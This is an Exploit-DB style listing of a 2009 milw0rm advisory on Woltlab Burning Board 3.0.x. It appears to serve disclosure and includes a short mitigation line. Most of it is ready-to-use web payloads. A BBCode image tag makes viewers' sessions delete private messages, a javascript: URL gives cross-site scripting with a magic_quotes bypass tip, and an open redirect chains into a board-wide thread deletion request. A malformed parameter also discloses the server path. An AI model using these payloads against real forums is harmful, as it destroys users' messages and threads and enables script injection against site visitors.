Woltlab Burning Board 3.0.x Multiple Remote Vulnerabilities

vendor:

Burning Board

by:

Juri Gianni aka yeat - staker[at]hotmail[dot]it

7.5

CVSS

HIGH

BBCode IMG / XSS / Delete PM / Full Path Disclosure / URL Redirection

79, 79, 79, 200, 79

CWE

Product Name: Burning Board

Affected Version From: 3.0.x

Affected Version To: 3.0.8

Patch Exists: YES

Related CWE: N/A

CPE: a:woltlab:burning_board:3.0.x

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Woltlab Burning Board 3.0.x Multiple Remote Vulnerabilities

BBCode IMG Tag Script Injection: Insert into a (forum message/private message/your signature) the code below: [img]http://[host]/[path]/wbb/index.php?page=PM&action=delete&pmID=[ID]&folderID=0[/img] The fake image doesn't show errors. Cross Site Scripting: http://[host]/[path]/wcf/acp/dereferrer.php?url=javascript:alert("Example"); you can bypass the magic_quotes_gpc with String.FromCharCode function. URL Redirection: http://[host]/[path]/wcf/acp/dereferrer.php?url=http://[host]/[path]/wbb/?page=ThreadAction&action=deleteAll&boardID=1&url=[local URL] Full Path Discloscure: http://[host]/[path]/wbb/index.php?page=[] it works on < 3.0.8 version only.

Mitigation:

Upgrade to the latest version of Woltlab Burning Board 3.0.x, apply the latest security patches, and ensure that all system components are up-to-date.

Source

Exploit-DB raw data:

+---------------------------------------------------------------------------+
| Woltlab Burning Board 3.0.x Multiple Remote Vulnerabilities               |
+---------------------------------------------------------------------------+
| by Juri Gianni aka yeat - staker[at]hotmail[dot]it                        |
| thanks to s3rg3770                                                        |
+---------------------------------------------------------------------------+

# Vulnerabilities: BBCode IMG / XSS / Delete PM / Full Path Disclosure / URL Redirection


# BBCode IMG Tag Script Injection
# [img]http://[host][/img]


# Delete Private Messages (BBCode IMG Tag Script Injection)

# Insert into a (forum message/private message/your signature) the code below:
# [img]http://[host]/[path]/wbb/index.php?page=PM&action=delete&pmID=[ID]&folderID=0[/img]
# The fake image doesn't show errors.


# Cross Site Scripting 

# http://[host]/[path]/wcf/acp/dereferrer.php?url=javascript:alert("Example");
# you can bypass the magic_quotes_gpc with String.FromCharCode function.


# URL Redirection

# http://[host]/[path]/wcf/acp/dereferrer.php?url=http://[host]
# http://[host]/[path]/wbb/?page=ThreadAction&action=deleteAll&boardID=1&url=[local URL]


# Full Path Discloscure 

# http://[host]/[path]/wbb/index.php?page=[]
# it works on < 3.0.8 version only.

# milw0rm.com [2009-03-09]